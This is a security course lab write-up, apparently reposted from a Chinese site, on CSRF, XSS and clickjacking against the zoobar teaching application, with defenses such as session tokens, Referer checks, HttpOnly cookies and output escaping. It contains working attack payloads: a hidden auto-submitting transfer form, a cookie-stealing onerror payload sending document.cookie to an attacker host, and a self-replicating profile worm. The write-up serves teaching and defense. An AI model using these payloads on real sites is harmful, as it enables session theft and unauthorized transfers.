Information Security Practice Lab 3: CSRF, XSS and Clickjacking
This lab can be completed on a single virtual machine; this write-up uses two. The VM hosting the myzoo site has IP 10.211.55.14, and the VM hosting the attacker's site has IP 10.211.55.16.
CSRF
Demonstrate and defend against a CSRF attack on the zoobar site. Pay attention to the granularity of the defense: every user must not end up with the same token, and the token must not be regenerated so often that normal operations fail.
Configuration
First register two accounts on the myzoo site: victim and csrfattack.
Configuration of the VM hosting the attacker's server (10.211.55.16):
1. Install apache2
sudo apt-get install apache2
2. Disable the firewall
sudo ufw disable
3. Configure hosts
sudo vim /etc/hosts
Append the following at the end:
10.211.55.14 www.myzoo.com # the IP address of the myzoo server
127.0.0.1 www.attack.com
4. Write the index.html file
cd /var/www/html
sudo vim index.html
Copy the following content into it:
index.html
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
    <title>my profile</title>
</head>
<body>
    <iframe name="it" style="display:none" width="600px" height="450px"></iframe>
    <form method="POST"
          name="transferform"
          action="http://www.myzoo.com/transfer.php"
          target="it"
          id="transferform"
          style="display:none">
        <input name="zoobars" type="text" value="1" size="5">
        <input name="recipient" type="text" value="csrfattack">
        <input type="hidden" name="submission" value="Send">
    </form>
    <img src="http://106.13.136.87:8080/101.jpeg">
    <script type="text/javascript">
        form = document.getElementById("transferform");
        form.submit();
    </script>
</body>
</html>
Configuration of the VM hosting the myzoo site (10.211.55.14):
1. Disable the firewall
sudo ufw disable
2. Configure hosts
sudo vim /etc/hosts
Append the following at the end:
127.0.0.1 www.myzoo.com
10.211.55.16 www.attack.com # the IP address of the attacker's server
Attack
1. In the profile of the csrfattack account, write the following link (its text reads "click to see my photos"):
<a href="http://www.attack.com"> 點擊查看我的照片哦</a>
Then click Save.
2. Log in to the victim account on 10.211.55.14 and, as victim, view csrfattack's profile.
When victim clicks that link, 1 zoobar is transferred to csrfattack.
Defense
Method 1: use the session
Modify the transfer.php file:
1. Add the following at the beginning
<?php
session_start();
?>
2. Modify the if statement
if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf'])
3. At lines 45-47 (just before the form), insert the following
<?php
$_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>
4. Add the following inside the form
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
The modified transfer.php is as follows:
<?php
// (1) start the session so the per-user token can be stored
session_start();
?>
<?php
require_once("includes/common.php");
nav_start_outer("Transfer");
nav_start_inner();

// (2) the transfer is only processed when the posted token matches the session's token
if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf']) {
    $recipient = $_POST['recipient'];
    $zoobars = (int) $_POST['zoobars'];

    $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $sender_balance = $rs["Zoobars"] - $zoobars;

    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $recipient_exists = $rs["PersonID"];

    if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
        $sql = "UPDATE Person SET Zoobars = $sender_balance " .
               "WHERE PersonID=$user->id";
        $db->executeQuery($sql);

        $sql = "SELECT Zoobars FROM Person WHERE Username='$recipient'";
        $rs = $db->executeQuery($sql);
        $rs = mysql_fetch_array($rs);
        $recipient_balance = $rs["Zoobars"] + $zoobars;

        $sql = "UPDATE Person SET Zoobars = $recipient_balance " .
               "WHERE Username='$recipient'";
        $db->executeQuery($sql);

        $result = "Sent $zoobars zoobars";
    }
    else $result = "Transfer to $recipient failed.";
}
?>
<p><b>Balance:</b>
<span id="myZoobars"> <?php
    $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $balance = $rs["Zoobars"];
    echo $balance > 0 ? $balance : 0;
?> </span> zoobars</p>
<?php
// (3) a fresh token for the form rendered below
$_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>
<form method=POST name=transferform
      action="<?php echo $_SERVER['PHP_SELF']?>">
<p>Send <input name=zoobars type=text value="<?php
    echo $_POST['zoobars'];
?>" size=5> zoobars</p>
<p>to <input name=recipient type=text value="<?php
    echo $_POST['recipient'];
?>"></p>
<!-- (4) the token travels with the form as a hidden field -->
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
<input type=submit name=submission value="Send">
</form>
<span class=warning><?php
    echo "$result";
?></span>
<?php
nav_end_inner();
?>
<script type="text/javascript" src="zoobars.js.php"></script>
<?php
nav_end_outer();
?>
Method 2: validate the HTTP Referer
Modify the transfer.php file:
1. Modify the if statement
if($_POST['submission'] && $_SERVER['HTTP_REFERER'] == "http://www.myzoo.com/transfer.php")
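The two defenses above, rewritten as reusable functions in an added example that is not part of the lab's transfer.php. It addresses the two cautions from the start of this section: the token is created once per session (unique per user, but not regenerated on every page load, so a user with two transfer tabs open is not rejected), and it is compared with hash_equals() rather than ==. The Referer check is a prefix match on the site origin instead of an exact URL. Assumptions: PHP 7.1+ (random_bytes, nullable types), a site origin of http://www.myzoo.com, and a session passed in as an array so the demonstration at the bottom runs from the command line; in transfer.php you would pass $_SESSION after session_start().

```php
<?php
// Added example, not the lab's transfer.php: session-token check (method 1) and
// Referer check (method 2) as functions. Assumes PHP 7.1+ and the origin below.

const SITE_ORIGIN = 'http://www.myzoo.com'; // assumed site origin

// Returns this session's CSRF token, creating it only when none exists yet.
// One token per session is unique per user (everyone sharing one token would
// defeat the check) but stable across page loads, so the second of two open
// transfer tabs does not fail because the first one regenerated the token.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf'];
}

// Checks the token posted with the form. hash_equals() compares in constant time
// and byte by byte; PHP's == would compare two all-digit "0e..." strings as
// numbers, which md5() output occasionally produces.
function csrf_verify(array $session, ?string $submitted): bool
{
    if (empty($session['csrf']) || $submitted === null) {
        return false;
    }
    return hash_equals($session['csrf'], $submitted);
}

// The hidden field to emit inside the form (escaped even though the token is hex).
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="token" value="' . $token . '"/>';
}

// Method 2 as a prefix match on the site origin rather than an exact URL, so
// http://www.myzoo.com/transfer.php?x=1 still passes; a request that carries no
// Referer header at all is rejected.
function referer_ok(array $headers): bool
{
    if (!isset($headers['Referer'])) {
        return false;
    }
    return strpos($headers['Referer'], SITE_ORIGIN . '/') === 0;
}

// Demonstration with an in-memory session and constructed requests.
$session = [];
$field = csrf_field($session); // first render creates the token
$token = csrf_token($session); // later renders reuse it

$legit  = ['token' => $token, 'zoobars' => '1', 'recipient' => 'victim', 'submission' => 'Send'];
$forged = ['zoobars' => '1', 'recipient' => 'csrfattack', 'submission' => 'Send']; // cross-site form: no token

printf("legit token accepted: %s\n", csrf_verify($session, $legit['token']) ? 'yes' : 'no');
printf("forged request accepted: %s\n", csrf_verify($session, $forged['token'] ?? null) ? 'yes' : 'no');
printf("same-site referer ok: %s\n", referer_ok(['Referer' => SITE_ORIGIN . '/transfer.php']) ? 'yes' : 'no');
printf("attack-site referer ok: %s\n", referer_ok(['Referer' => 'http://www.attack.com/']) ? 'yes' : 'no');
```

In transfer.php the lab's `$_POST['token'] == $_SESSION['csrf']` would become `csrf_verify($_SESSION, $_POST['token'] ?? null)`, and `echo csrf_field($_SESSION);` replaces both the token line before the form and the hidden input inside it. Browsers omit the Referer header in several situations (privacy settings, a Referrer-Policy on the referring page), so a Referer-only check turns away some legitimate users; treat it as a second layer next to the token, not a replacement.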
XSS
Demonstrate and defend against XSS attacks on the zoobar site; be sure to implement cookie theft and an XSS worm.
Without modifying the myzoo/user.php source, it is hard to carry out an XSS attack.
Modify the myzoo/user.php source as follows
$allowed_tags =
'<script><a><br><b><h1><h2><h3><h4><i><img><li><ol><p><strong><table>' .
'<tr><td><th><u><ul><em><span>';
$disallowed =
'eval|setTimeout|setInterval|target|'.
'onAbort|onBlur|onChange|onClick|onDblClick|'.
'onDragDrop|onFocus|onKeyDown|onKeyPress|'.
'onKeyUp|onLoad|onMouseDown|onMouseMove|onMouseOut|'.
'onMouseOver|onMouseUp|onMove|onReset|onResize|'.
'onSelect|onSubmit|onUnload';
Cookie theft
Configuration
Create the account xssattack on the myzoo site.
Attacker VM configuration (10.211.55.16)
1. Create the xss.php file
sudo vim /var/www/html/xss.php
Copy the following content into it
<?php
// Receives the value sent in the "cookie" query parameter and echoes it back
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : null;
if($cookie !== null){
    echo 'get cookie: '.$cookie;
}else{
    echo 'not get cookie';
}
?>
Attack
Modify the profile of the xssattack account
<img src=x onerror=javascript:window.open("http://www.attack.com/xss.php?cookie="+document.cookie) />
When the user victim visits xssattack's profile, a new window opens that prints the captured cookie value.
Defense
Method 1: set HttpOnly
If the HttpOnly attribute is set on the cookie, JavaScript cannot read the cookie's contents, which effectively stops an XSS attack from stealing the cookie and so improves cookie security.
1. Modify the auth.php file
// setcookie($this->cookieName, $cookieData, time() + 31104000);
setcookie($this->cookieName, $cookieData, time() + 31104000, NULL, NULL, NULL, true); // seventh argument: httponly
Method 2: disable tags
XSS worm
Attack
Before carrying out this attack, the CSRF defense must be removed: the worm's POST to transfer.php carries no token, so the session-token check would reject it.
Register the account xssattack1
Modify xssattack1's profile
<span id="hack">
<script>
xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","http://www.myzoo.com/transfer.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("zoobars=1&recipient=xssattack1&submission=Send");
xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST","http://www.myzoo.com/index.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
str = "<span id=hack>"
str += document.getElementById("hack").innerHTML + "</span>";
str = encodeURIComponent(str);
str = "profile_submit=Save&profile_update=" + str;
xmlhttp.send(str);
</script>
</span>
When other users visit xssattack1's profile, they transfer 1 zoobar to xssattack1 and xssattack1's profile is copied into their own profile.
Defense
Method 1: input filtering
Input filtering is easy to understand: with a whitelist or a blacklist, filter out every tag that could be used in an attack.
Method 2: output escaping
Output escaping is needed because malicious input that is stored in the site's database is ultimately executed only when some program outputs it. So escape all content when it is read from the database, before it is displayed on the page. In PHP, the htmlentities() function converts characters to HTML entities. The purpose of HTML character entities is to display reserved characters correctly: for example, to show <br> on a page, writing <br> directly in the HTML makes the browser treat it as markup rather than as a string, so < and > must be converted to the entities &lt; and &gt;. With htmlentities, all attack code, however it is constructed, becomes ordinary characters and has no attack effect.
Modify the users.php file
$profile = strip_tags($profile, $allowed_tags);
$profile = htmlentities($profile); // add this line in users.php
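The HttpOnly cookie from the cookie-theft defense and the output escaping from the worm defense, written as two functions in an added example that is not the lab's auth.php or users.php. The cookie name, cookie value and the stored profile text are constructed for the demonstration; the example assumes PHP 7.3+ for the setcookie() options array.

```php
<?php
// Added example, not the lab's auth.php or users.php: HttpOnly session cookie and
// output escaping as functions. Assumes PHP 7.3+ (setcookie options array).

// A login cookie that scripts cannot read: document.cookie no longer returns it,
// so a window.open(".../xss.php?cookie=" + document.cookie) payload sends an
// empty value. SameSite=Lax additionally keeps the cookie off cross-site POSTs
// such as the hidden transfer form from the CSRF section. Add 'secure' => true
// once the site is served over HTTPS.
function set_login_cookie(string $name, string $value): bool
{
    return setcookie($name, $value, [
        'expires'  => time() + 31104000, // same lifetime as the lab's auth.php
        'path'     => '/',
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Escape on output: every character HTML could interpret becomes an entity, so
// whatever was stored in the profile is displayed as text, never parsed as markup.
// ENT_QUOTES also escapes ' and ", which matters inside attribute values.
function escape_profile(string $profile): string
{
    return htmlspecialchars($profile, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Must run before any output, or the Set-Cookie header cannot be sent.
// Cookie name and value are hypothetical placeholders.
set_login_cookie('zoobar_login', 'constructed-cookie-value');

// Constructed profile text in the shape of the payloads above: one event-handler
// injection plus one tag the whitelist was meant to allow.
$stored_profile = '<img src=x onerror=alert(1)> <b>my photos</b>';

echo escape_profile($stored_profile), PHP_EOL;
```

Two caveats worth keeping in mind. Escaping the whole string also turns the `<b>` that $allowed_tags was meant to permit into literal text, so the profile loses all formatting; keeping a subset of tags safely needs a sanitizer that understands attributes, not htmlentities() over everything. And HttpOnly does not stop the worm: it runs inside the victim's logged-in session and never needs the cookie value, so the token check and output escaping are the defenses that apply to it.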
Clickjacking
Please credit the source when reposting. Link to this article: https://www.uj5u.com/ruanti/245712.html